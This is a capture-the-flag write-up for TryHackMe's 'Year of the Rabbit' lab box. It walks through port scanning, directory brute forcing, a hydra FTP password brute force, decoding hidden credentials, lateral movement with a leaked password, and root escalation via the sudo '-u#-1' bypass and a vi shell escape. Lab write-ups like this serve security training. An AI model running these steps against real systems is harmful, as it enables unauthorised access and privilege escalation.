THM Writeup – Year of the Rabbit
Time to enter the warren…
Let’s have a nice gentle start to the New Year!
Can you hack into the Year of the Rabbit box without falling down a hole?
(Please ensure your volume is turned up!)
Add IP address to your hosts
file:
echo '10.10.64.100 rabbit.thm' >> /etc/hosts
Scan the target machine – basic scan – find open ports first:
nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv rabbit.thm
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 21,22,80 rabbit.thm
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (EdDSA)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Enumeration
Directory bruteforce the web application:
root@ip-10-10-113-0:~# gobuster dir -u http://rabbit.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
/index.html (Status: 200)
/assets (Status: 301)
/server-status (Status: 403)
===============================================================
Check the assets
directory – browse to http://rabbit.thm/assets/
There is Rick Astley’s song Never gonna give you up and a CSS file.
Check the CSS file:
We found a secret php page:
/sup3r_s3cr3t_fl4g.php
Let’s browse to it http://rabbit.thm/sup3r_s3cr3t_fl4g.php
When we click OK, we are redirected to youtube.com Rick Astley’s song again…
Fire up BurpSuite, intercept the traffic and intercept the response to the first request:
We found another hidden directory:
/WExYY2Cv-qU
To intercept a response to a request, right click request body, select Do intercept -> Response to this request:
Now browse to the directory we found http://rabbit.thm/WExYY2Cv-qU
Download the picture and examine it:
root@ip-10-10-113-0:~# exiftool Hot_Babe.png
ExifTool Version Number : 10.80
File Name : Hot_Babe.png
Directory : .
File Size : 464 kB
File Modification Date/Time : 2022:02:15 15:36:39+00:00
File Access Date/Time : 2022:02:15 15:36:52+00:00
File Inode Change Date/Time : 2022:02:15 15:36:39+00:00
File Permissions : rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 512
Image Height : 512
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
SRGB Rendering : Perceptual
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 512x512
Megapixels : 0.262
Hm, nothing of interest, let’s try strings
now:
Now this is awesome, we’ve got FTP username and list of possible passwords.
Put all those passwords to a .txt
file and use hydra
to bruteforce it:
root@ip-10-10-113-0:~# hydra -l ftpuser -P pwds.txt ftp://rabbit.thm -t 4 -f
[21][ftp] host: rabbit.thm login: ftpuser password: [REDACTED]
Login to FTP:
root@ip-10-10-113-0:~# ftp rabbit.thm
Connected to rabbit.thm.
220 (vsFTPd 3.0.2)
Name (rabbit.thm:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Look around:
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jan 23 2020 .
drwxr-xr-x 2 0 0 4096 Jan 23 2020 ..
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
ftp> get Eli's_Creds.txt -
remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< [REDACTED] ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
226 Transfer complete.
758 bytes received in 0.00 secs (889.7048 kB/s)
I knew I have already seen strings like these, but couldn’t remember how it is called – I knew, an ugly word is part of the name, so I used google:
Then I did another search:
And came accross this site https://www.dcode.fr/brainfuck-language
Now we probably have SSH username and password.
User flag
Try to login via SSH:
root@ip-10-10-113-0:~# ssh [REDACTED]@rabbit.thm
The authenticity of host 'rabbit.thm (10.10.64.100)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'rabbit.thm,10.10.64.100' (ECDSA) to the list of known hosts.
[REDACTED]@rabbit.thm's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
[REDACTED]@year-of-the-rabbit:~$
Great, we are connected via SSH to the target machine.
Find the user flag:
eli@year-of-the-rabbit:~$ ls -lA
total 648
lrwxrwxrwx 1 eli eli 9 Jan 23 2020 .bash_history -> /dev/null
-rw-r--r-- 1 eli eli 220 Jan 23 2020 .bash_logout
-rw-r--r-- 1 eli eli 3515 Jan 23 2020 .bashrc
drwxr-xr-x 8 eli eli 4096 Jan 23 2020 .cache
drwx------ 11 eli eli 4096 Jan 23 2020 .config
-rw------- 1 eli eli 589824 Jan 23 2020 core
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Desktop
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Documents
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Downloads
drwx------ 3 eli eli 4096 Jan 23 2020 .gconf
drwx------ 2 eli eli 4096 Jan 23 2020 .gnupg
-rw------- 1 eli eli 1098 Jan 23 2020 .ICEauthority
drwx------ 3 eli eli 4096 Jan 23 2020 .local
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Music
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Pictures
-rw-r--r-- 1 eli eli 675 Jan 23 2020 .profile
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Public
drwx------ 2 eli eli 4096 Jan 23 2020 .ssh
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Templates
drwxr-xr-x 2 eli eli 4096 Jan 23 2020 Videos
eli@year-of-the-rabbit:~$ ls -lA /home/
total 8
drwxr-xr-x 16 eli eli 4096 Jan 23 2020 eli
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23 2020 gwendoline
eli@year-of-the-rabbit:~$ ls -la /home/gwendoline/
total 24
drwxr-xr-x 2 gwendoline gwendoline 4096 Jan 23 2020 .
drwxr-xr-x 4 root root 4096 Jan 23 2020 ..
lrwxrwxrwx 1 root root 9 Jan 23 2020 .bash_history -> /dev/null
-rw-r--r-- 1 gwendoline gwendoline 220 Jan 23 2020 .bash_logout
-rw-r--r-- 1 gwendoline gwendoline 3515 Jan 23 2020 .bashrc
-rw-r--r-- 1 gwendoline gwendoline 675 Jan 23 2020 .profile
-r--r----- 1 gwendoline gwendoline 46 Jan 23 2020 user.txt
Ok, the user flag is in gwendoline’s home directory and only she has permissions to read it.
So we have to make a lateral movement – do you remember the message for Gwendoline when we first logged in:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
Let’s try to find that secret place:
eli@year-of-the-rabbit:/$ find / -type d -name 's3cr3t' 2>/dev/null
/usr/games/s3cr3t
eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -lA
total 4
-rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just [REDACTED]
Honestly!
Yours sincerely
-Root
We have Gwendoline’s password so switch to gwendoline
user:
eli@year-of-the-rabbit:~$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/home/eli$
Now read the user flag:
gwendoline@year-of-the-rabbit:/home/eli$ cat /home/gwendoline/user.txt
THM{[REDACTED]}
Root flag
There are few things I try to escalate my privileges before going for scripts like linpeas.sh
:
sudo -l
cat /etc/crontab
getcap -r 2>/dev/null
find / -type f -perm -4000 2>/dev/null
So let’s check the first one:
gwendoline@year-of-the-rabbit:/tmp$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
So our user gwendoline
is allowed to run vi as any user but root. At this point I got stucked for a while then I came accross this site https://www.zdnet.com/article/10-years-old-sudo-bug-lets-linux-users-gain-root-level-access/ – reading the article I found a vulnerability that is called minus 1 uid:
I clicked the link and read another article when came to this section:
So I went and tried that and it worked:
gwendoline@year-of-the-rabbit:/tmp$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Now a vi
editor is opened – go to the command line by typing :
, then type !/bin/bash
:
and press ENTER:
and you became root user.
Now just read the root flag:
root@year-of-the-rabbit:/home/gwendoline# cat /root/root.txt
THM{[REDACTED]}
Do you like this writeup? Check out other THM Writeups.